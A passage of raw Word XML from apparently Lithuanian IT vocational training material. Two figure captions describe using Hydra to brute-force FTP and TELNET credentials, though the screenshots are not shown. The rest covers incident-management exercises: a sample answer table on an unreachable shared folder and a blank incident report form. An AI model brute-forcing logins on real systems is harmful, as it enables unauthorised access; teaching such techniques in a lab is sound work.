                    <a:blip r:embed="rId263">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="817245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EAF827" w14:textId="79ABFF4F" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00C77190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. pav. Hydra naudojimas. Jėgos naudojimas FTP vartotojo vardui ir slaptažod</w:t>
      </w:r>
      <w:r w:rsidR="0088136A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ž</w:t>
      </w:r>
      <w:r w:rsidR="00C77190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iui gauti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713EAA76" w14:textId="5DFA30B1" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="00C77190"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622AEB7D" w14:textId="77777777" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="00C77190" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F29058" w14:textId="7D72AA74" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="77D3798B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="519AA852" wp14:editId="56ED2460">
            <wp:extent cx="6299836" cy="991235"/>
            <wp:effectExtent l="0" t="0" r="5715"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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId264">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299836" cy="991235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="046905BF" w14:textId="2DBC17F1" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00C77190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. pav. Hydra naudojimas. Jėgos naudojimas TELNET vartotojo vardui ir slaptažodžiui gauti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32589BC8" w14:textId="4C0E30C0" w:rsidR="00C77190" w:rsidRPr="005A5C28" w:rsidRDefault="00C77190" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Zykas A. (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51072D36" w14:textId="77777777" w:rsidR="00B80AE2" w:rsidRPr="005A5C28" w:rsidRDefault="00B80AE2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E167B11" w14:textId="30C3EA7A" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Modulis </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>„Informacinių ir ryšių technologijų pokyčių valdymas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C268C" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E2A9F3" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INCIDENTŲ VALDYMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B5DE3" w14:textId="2C7BA99E"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7506"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4B17140E" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="142DA968"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Incidentas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36C8A963"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Incidento informacija, detalės</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00131ECD" w:rsidRPr="005A5C28" w14:paraId="23B83D89" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6935CD"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Nepasiekiamas bendro naudojimo katalogas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1241D5B6"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Vartotojas negali atidaryti, patekti, peržiūrėti katalogo, kuriuo dalinamasi tinkle su grupe vartotojų. Galimos priežastys:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B0719A" w14:textId="25A00B7E" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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Operacinės sistemos sutrikimas</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4602C330" w14:textId="0D0663DD" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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Programinės įrangos s</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ut</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>rikimas</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7306E2A7" w14:textId="4931D307" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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Vartotojo teisių pakitimai arba pakeitimai</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3205D2" w14:textId="177980CC" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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Kenkėjiškos programos veikimo požymiai</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C162B86" w14:textId="2B4ED000" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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Naudojamo kompiuterio tinklo veiklos sutrikimas</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19906C2E" w14:textId="098E6B31" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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Nuadojamos infrastrukūros tinklo ve</w:t>
            </w:r>
            <w:r w:rsidR="11CE58A7" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>klos sutrikimas</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5492D28A" w14:textId="37B2EC73" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="123"/>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Serveris nepasiekiamas</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA3C9F5"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Rekomenduojami sprendimo būdai:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69877CF7" w14:textId="6625D3B6" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">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Savarankiškas paslaugos atstatymas (su turimomis vartotojo teisėmis)</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD1FC15" w14:textId="5437E873" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">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Programinės įrangos diagnostika, paleidimas iš naujo</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC057C4" w14:textId="7FDD5CDD" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">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Operacinės sistemos paleidimas iš naujo</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF3E580" w14:textId="6A40895C" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">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Kreiptis į sistemos administratorių</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E1D8908"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p>
    <w:p w14:paraId="7E1EF70E"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Anketa:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4955"/>
        <w:gridCol w:w="4956"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0DCEDB13" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04F8DDBC"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A5F1C55"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Užpildyti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="70E09B17" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B7147C"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Pildančio asmens Vardas, Pavardė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3199B5CF"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0E297E7E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73AAB9D6"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Darbo vietos ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77A849F0"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0735F920" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68E65674"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Naudojama operacinė sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="678F8032"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5190B53E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA2F6E0"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Incidento vieta sistemoje (Operacinės sistema, programinė įranga, fizinė įranga, kita)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E5B655"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="25EEB49D" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3785E79C"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Incidento apibūdinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27132E94"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F74232" w:rsidRPr="005A5C28" w14:paraId="16F36F4C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5193C480" w14:textId="40C80B22"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Papildoma informacija (informacija gali būti reikšminga sistemos administratoriui reaguojan</w:t>
            </w:r>
            <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>čiam</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> į incidentą)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE637B2"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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="140182F7"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p>
    <w:p w14:paraId="21CAF5B3" w14:textId="123C4238" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INCIDENTO GYVAVIMO CIKLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347AE7E2" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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O PAVYZDYS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1EA230" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1464F871" wp14:editId="731CC993">
            <wp:extent cx="5022544" cy="4687910"/>
            <wp:effectExtent l="0" t="0" r="6985"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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId265">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5051093" cy="4714557"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34410A84" w14:textId="69AE6F3D" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
